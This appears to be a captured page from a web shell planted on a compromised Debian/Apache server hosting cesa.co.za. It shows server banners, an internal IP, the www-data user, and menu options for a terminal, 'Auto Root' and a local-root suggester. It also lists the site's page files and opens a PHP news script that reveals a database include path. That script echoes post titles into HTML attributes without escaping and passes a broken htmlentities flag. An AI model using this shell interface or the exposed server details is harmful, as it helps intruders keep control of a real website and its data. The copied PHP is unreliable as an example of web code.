Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
app /
pages /
Delete
Unzip
Name
Size
Permission
Date
Action
404.html
472
B
-rw-r--r--
2018-03-06 12:25
about.html
1.08
KB
-rw-r--r--
2018-03-06 12:25
catalog.html
741
B
-rw-r--r--
2018-03-06 12:25
cenews.php
1.31
KB
-rw-r--r--
2020-08-13 09:59
latestnews.php
1.18
KB
-rw-r--r--
2020-08-13 10:50
members.php
1.43
KB
-rw-r--r--
2018-03-06 13:22
page-loader-component.html
3.97
KB
-rw-r--r--
2018-03-06 12:25
page-loader-template7.html
1.55
KB
-rw-r--r--
2018-03-06 12:25
portal.php
880
B
-rw-r--r--
2018-03-06 13:16
practicenotes.php
68.64
KB
-rw-r--r--
2019-06-26 08:24
product.html
927
B
-rw-r--r--
2018-03-06 12:25
publications.html
1.74
KB
-rw-r--r--
2019-11-29 07:18
publications.php
2.2
KB
-rw-r--r--
2020-08-13 09:59
request-and-load.html
762
B
-rw-r--r--
2018-03-06 12:25
sce.php
1.82
KB
-rw-r--r--
2019-12-04 04:24
search.php
5.88
KB
-rw-r--r--
2020-01-24 10:27
searchresults.php
30
B
-rw-r--r--
2018-01-24 10:56
ypf.php
1.25
KB
-rw-r--r--
2019-12-04 04:24
Save
Rename
<template> <div class="page" data-name="catalog"> <div class="navbar"> <div class="navbar-inner sliding"> <div class="left"> <a href="#" class="link back"> <i class="icon icon-back"></i> <span class="ios-only">Back</span> </a> </div> <div class="title">Latest News</div> </div> </div> <div class="page-content"> <?php include_once("/usr/www/users/saacea/app/inc_dbwp.php"); $sql="select * from wp_posts where post_status='publish' and post_type='post' order by post_date desc LIMIT 0,20"; $rec=mysqli_query($conn_wp, $sql); while ($row=mysqli_fetch_assoc($rec)) { ?> <div class="block block-strong"> <a href="https://www.cesa.co.za/<?php echo $row["post_name"]; ?>" target="_blank" class="external" style="color: rgb(55, 94, 173); text-decoration: none;" title="<?php echo $row["post_title"]; ?>"><b><?php echo htmlentities($row["post_title"], ENT_COMPAT || ENT_SUBSTITUTE, "ISO-8859-1"); ?></b></a> <hr> </div> <?php } ?> </div> </div> </template> <script> return { data: function () { return { products: this.$root.products, }; } }; </script>